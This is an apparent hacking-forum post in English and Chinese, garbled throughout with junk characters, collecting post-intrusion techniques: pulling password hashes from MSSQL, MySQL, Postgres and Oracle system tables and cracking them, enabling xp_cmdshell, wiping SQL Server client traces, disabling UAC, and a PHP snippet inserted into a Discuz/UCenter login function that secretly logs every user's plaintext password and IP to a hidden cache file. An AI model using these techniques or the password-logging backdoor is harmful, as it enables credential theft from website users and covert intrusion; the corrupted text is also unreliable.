1 Z! o; B9 Y( G8 \0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503413 n! D" M! u9 n7 K
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
" `) B: n: |. I I8 A7 g8 o+ I6 u' r; N' h" o* B% d& [
0×0100- constant header" v) J/ B3 y; a" f" c& ~
34767D5C- salt
" w2 _5 m. \, n! ^) D0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2 X7 P3 T) X1 M* L' H9 i3 L2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
@5 Y3 v# t" K4 Q, p9 O) ?crack the upper case hash in ‘cain and abel’ and then work the case sentive hash) s8 X/ l( U- Q2 t p' Q4 p9 W
SQL server 2005:-9 P+ k3 q5 J+ y7 v7 X k! A+ Y- W
SELECT password_hash FROM sys.sql_logins where name='sa'; _$ H) i6 {" I3 d p
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
& ^' K$ P! V. {- ^7 P% q0×0100- constant header# \# l& B+ H$ A! E Z0 P
993BF231-salt/ m! c w1 G# e: o1 l/ ~: D
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
( F, g, M, |, n! Gcrack case sensitive hash in cain, try brute force and dictionary based attacks.9 i6 \4 R9 r) a8 L
- b' ?5 `. K6 D7 R8 s1 t* [% O
update:- following bernardo’s comments:-
1 h, S# h8 M2 e0 U6 Puse function fn_varbintohexstr() to cast password in a hex string.
s5 [7 \5 p3 a) X# v% B- ae.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
# p/ ~3 Z6 z& _% b5 X7 H M
6 y: x! _6 r9 pMYSQL:-. V! t, Z$ X0 V3 b% e
- i% ?9 f7 c1 m
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
. K( k. T7 x% Z
5 p& C1 X i( x+ ~; S& L/ o*mysql < 4.11 ^! r) R2 H+ k
5 `' g$ }9 r" Z+ [) n: ? r7 d3 h' ^mysql> SELECT PASSWORD(‘mypass’);
- R4 v, Q a6 @2 l# t+ U+——————–+
) ^- O0 B) C) j8 |) m| PASSWORD(‘mypass’) |) y: u% F0 o! x% _" m
+——————–+
7 z0 r0 {8 I. l| 6f8c114b58f2ce9e |$ t; m- m* o: z! N
+——————–+
4 ^' d( d0 X' P: [ m
' E0 ]' [, g9 @2 X+ k- c" _0 H& E*mysql >=4.1
( T, y @& K" P, b
! o) }6 k H2 ^, K7 s `# xmysql> SELECT PASSWORD(‘mypass’);
; s* p. M) ?0 z# ]! F# E+ ]+——————————————-++ Q% _3 c# E7 g9 P
| PASSWORD(‘mypass’) |
# a+ ^) S- q3 b% I/ n) b+——————————————-+
* l" K n2 l( I, b! X, e| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |7 J/ c3 B3 T4 a; V
+——————————————-+
) P! G3 @! c$ h7 @# v) [( m- W1 v* \. n: Q1 s' r; Q9 b; [0 R: b
Select user, password from mysql.user
; S0 D' p x3 m. o4 [The hashes can be cracked in ‘cain and abel’' ^9 K5 z# k3 y0 U } C
9 H5 a3 `, X7 M( E# ^
Postgres:-
2 N/ z. X3 L* j. a0 G6 BPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)3 r( M3 t) P# B/ }9 I
select usename, passwd from pg_shadow;
, H5 R1 B8 G) z0 }" X. G. h: K5 Zusename | passwd
3 n; a4 D, Y' a7 |' i; L1 f Q——————+————————————-
8 d- Y! C9 W; g4 S% L7 J3 I, { {# Y' itestuser | md5fabb6d7172aadfda4753bf0507ed4396
' p9 f4 R2 N' B( T5 Q5 _7 nuse mdcrack to crack these hashes:-
8 z, X8 i, p- V( |$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
, w- m+ T! @# x8 @, u5 S5 d- c* c2 |( i" d
Oracle:-! O& m$ r8 y" a& I( E
select name, password, spare4 from sys.user$+ N' F4 [: B. v
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
3 U4 R6 t# ?; g$ E9 hMore on Oracle later, i am a bit bored….: f+ i2 ]2 L, m2 S
% ]$ \7 {% C6 p: V1 D0 e) u( Y
2 O4 D Z o. x+ \: y% |/ U在sql server2005/2008中开启xp_cmdshell
7 W+ j& O& T& p6 o+ z% b; C-- To allow advanced options to be changed. b" S( E. q& |* d) P( x5 s2 t7 v6 n# [
EXEC sp_configure 'show advanced options', 1
, S1 C* K& t5 n% z$ \0 gGO
. L7 l2 \5 Y5 y; P* q2 f-- To update the currently configured value for advanced options.5 w. ~5 g, B6 V
RECONFIGURE
& [ B% m5 ^% V6 u* ]GO
" p: b6 w" x7 O8 Y7 ~7 y7 X2 y u8 P-- To enable the feature.
( @4 `9 y# [4 I9 LEXEC sp_configure 'xp_cmdshell', 1
3 P' @) s4 V3 h; g1 ]1 UGO
4 ] P3 p1 t$ L' {-- To update the currently configured value for this feature.
. o6 V. N r. A7 V, j/ r% aRECONFIGURE
; O+ F' Z4 V( T6 a- |- UGO
" y" ?, A& D! ~& ?1 k9 dSQL 2008 server日志清除,在清楚前一定要备份。
6 L7 c+ e# m( {如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:( s( c5 u, ]9 n" K/ p
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
2 u4 w! u. h! L7 v4 Y' m1 n* A$ i, f8 S
对于SQL Server 2008以前的版本:
5 _7 g8 c( o% Z' h" t" e0 FSQL Server 2005:
. ?2 c0 t: |% O; P$ Y删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat" {9 k) M' g) O% b
SQL Server 2000:
6 R$ {, s% }% E+ ~清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
. \( o( r. r0 ?0 r
9 z3 F+ F* M# c( `8 t本帖最后由 simeon 于 2013-1-3 09:51 编辑# A Z, \3 L4 ~5 L2 s
e7 o0 v6 q3 a2 V6 E
4 S1 o2 i6 g; D3 T/ V" C- uwindows 2008 文件权限修改
# E. d) W% l4 A& I1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx" C5 |% ]0 o+ ~( }9 ~! s
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad987 a& X$ U. I2 U. E* \$ c
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,. p7 z. E) n' `$ n7 R5 R
4 J3 ~5 T Q$ ~& G
Windows Registry Editor Version 5.00
N" A, [6 N" _, H& U9 H+ N[HKEY_CLASSES_ROOT\*\shell\runas]3 Y( L7 d: v4 o1 P3 z
@="管理员取得所有权"
! M4 ~# O. q+ j+ y"NoWorkingDirectory"=""
$ G" B8 e: a q" q4 y[HKEY_CLASSES_ROOT\*\shell\runas\command]
+ h. U) X: g5 b- I k8 p1 X, F@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
/ k4 f" d1 C. u9 \2 q5 l! P! o9 I"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F", B* o* [' ^4 m$ @0 B( W
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
3 w Z, H$ c8 U. G n0 V@="管理员取得所有权"' ~* }0 b& R/ W2 X
"NoWorkingDirectory"=""1 _+ L+ w! |6 q' n" ^# u
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]7 H) O; ~: [& g0 l: l1 i
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"- x1 M V3 T- c; ~$ c
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' o& G. w2 ?- u
9 b) h- ^0 j. x y4 E, V7 s- J
[HKEY_CLASSES_ROOT\Directory\shell\runas]
# M% q* p' a$ `+ s7 p@="管理员取得所有权"
. \ i. A: o: v& a# \/ w! j"NoWorkingDirectory"=""
. t* i7 M* T; }7 v6 z0 C$ S! L[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
. ?$ ]9 t9 K) ^/ o. ?@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
1 [* q% E+ I1 x3 @"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
/ X/ F" h$ B8 I. w5 n: B5 V# ^/ a
: C) @6 ?2 }# V6 B* I9 S) f/ f9 ~/ k2 F: O0 n+ P7 j& w% v
win7右键“管理员取得所有权”.reg导入
% N5 L/ |, e2 Q4 C5 A二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
" M Z/ _0 b, W' [4 e1、C:\Windows这个路径的“notepad.exe”不需要替换6 ~3 X# z1 w+ c: H! o
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换) p# t$ y" C$ G7 [
3、四个“notepad.exe.mui”不要管- ~; M, d, Y1 `8 @ h
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和* N' @$ h A0 C5 m. D. N6 q8 r
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”& X" C( T3 o) \3 Q
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
L' E$ m5 ]( b& }替换完之后回到桌面,新建一个txt文档打开看看是不是变了。& X- [% X' H2 ?: s4 X9 B* ]5 G
windows 2008中关闭安全策略: 7 i! ]# U+ e4 v" G
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
$ s5 s$ o, C% i. s8 c修改uc_client目录下的client.php 在
`3 v C; j# J+ E0 tfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {; j. {, b0 M4 r" R8 w" F
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
% l% i! ^2 G0 b! S9 J. f; y) ?你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw* O2 Z, O0 A) P2 s. k: D3 R
if(getenv('HTTP_CLIENT_IP')) {
4 ]7 v' C$ a! Z" E$ y( s$onlineip = getenv('HTTP_CLIENT_IP');6 e' z9 O E" F+ }8 c9 H- Q, U
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
# R" [. Q; ?% v4 R' j/ J$onlineip = getenv('HTTP_X_FORWARDED_FOR');
6 R% _/ f) d" ~" y. `} elseif(getenv('REMOTE_ADDR')) {
3 l6 C7 N; \+ I g: @' q$onlineip = getenv('REMOTE_ADDR');1 n& S# z5 T8 z' e
} else {' p P& _- z9 b" H3 `" K
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];* l6 ~$ L2 N! A7 }/ a3 `- ]
}& p3 P( d- ~- x1 U
$showtime=date("Y-m-d H:i:s");; ^& t- e1 A" D% V
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";* w- u% I3 T8 v+ e% [ x
$handle=fopen('./data/cache/csslog.php','a+');0 Z$ `+ H# w" h+ F
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对